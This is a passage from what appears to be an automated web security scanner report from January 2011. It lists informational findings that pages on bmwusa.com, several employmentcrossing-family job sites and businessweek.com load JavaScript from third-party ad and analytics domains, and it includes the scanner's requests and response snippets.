Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:21 GMT;path=/
Content-Length: 212726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.282. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/xdrive35i/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:03:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:23:25 GMT;path=/
Content-Length: 226005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.283. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/xdrive35i/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:01:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:58 GMT;path=/
Content-Length: 215485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.284. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/x6seriessacmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/xdrive35i/x6seriessacmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:02:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:22:32 GMT;path=/
Content-Length: 202207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.285. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/xdrive50i/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:03:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:23:56 GMT;path=/
Content-Length: 212730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.286. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/xdrive50i/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:05:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:25:38 GMT;path=/
Content-Length: 226194

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.287. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/xdrive50i/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:04:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:24:04 GMT;path=/
Content-Length: 215296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.288. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/x6seriessacmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x6/xdrive50i/x6seriessacmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:04:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:24:20 GMT;path=/
Content-Length: 202210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.289. http://www.bmwusa.com/standard/content/vehicles/2011/z4/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/z4/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:05:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:25:57 GMT;path=/
Content-Length: 240756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.290. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4explore.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/z4/z4explore.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:06:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:26:40 GMT;path=/
Content-Length: 180450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.291. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/z4/z4sdrive30i/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:07:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:27:14 GMT;path=/
Content-Length: 213969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.292. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/z4/z4sdrive30i/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:07:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:27:38 GMT;path=/
Content-Length: 215060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.293. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/z4seriesroadstermediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/z4/z4sdrive30i/z4seriesroadstermediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:07:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:27:57 GMT;path=/
Content-Length: 202214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.294. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/z4/z4sdrive35i/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:08:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:28:19 GMT;path=/
Content-Length: 213976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.295. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/z4/z4sdrive35i/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:08:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:28:54 GMT;path=/
Content-Length: 215086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.296. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/z4seriesroadstermediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/z4/z4sdrive35i/z4seriesroadstermediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:08:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:28:55 GMT;path=/
Content-Length: 202217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.297. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/Content/Forms/Login.aspx

Issue detail

The response dynamically includes the following script from another domain:

https://com-bmwusa.netmng.com/

Request

Response

15.298. http://www.businessanalystcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.businessanalystcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.businessanalystcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:41 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kldqa0cqamr0mp6anoh752e7o2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 124047

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.299. http://www.businessdevelopmentcrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.businessdevelopmentcrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.businessdevelopmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:41 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ru1216s8gi6hento64jtdlqce3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116452

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.300. http://www.businessweek.com/news/2011-01-20/merrill-lynch-jm-said-to-be-hired-for-power-finance-share-sale.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.businessweek.com
Path:	/news/2011-01-20/merrill-lynch-jm-said-to-be-hired-for-power-finance-share-sale.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://businessweek.checkm8.com/adam/cm8adam_1_call.js
http://jlinks.industrybrains.com/jsct?sid=046&ct=BUSINESSWEEK_HOMEPAGE_AND_ROS&tr=ROS&num=5&layt=1&fmt=simp
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /news/2011-01-20/merrill-lynch-jm-said-to-be-hired-for-power-finance-share-sale.html HTTP/1.1
Host: www.businessweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5
Content-Language: en
X-Powered-By: Servlet/2.4 JSP/2.0
benv: nybweb04
bvh: www.businessweek.com
Content-Type: text/html; charset=UTF-8
Date: Fri, 21 Jan 2011 18:30:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta conten
...[SNIP]...
</script>
<script type="text/javascript" src="http://businessweek.checkm8.com/adam/cm8adam_1_call.js"></script>
...[SNIP]...
</h2>
<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=046&ct=BUSINESSWEEK_HOMEPAGE_AND_ROS&tr=ROS&num=5&layt=1&fmt=simp"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

15.301. http://www.callcentercrossing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.callcentercrossing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://script.employmentcrossing.com/bubble.js
http://script.employmentcrossing.com/general.js
http://script.employmentcrossing.com/jquery/jquery.autocomplete.js
http://script.employmentcrossing.com/jquery/jquery.js
http://script.employmentcrossing.com/popup.js
http://script.employmentcrossing.com/video.js
http://srvr12.pdcsrvr.com/media/www/empsc/fl.js
http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js

Request

GET / HTTP/1.1
Host: www.callcentercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=prr05v672vhpd9l46bt5lu88r3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 128551

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
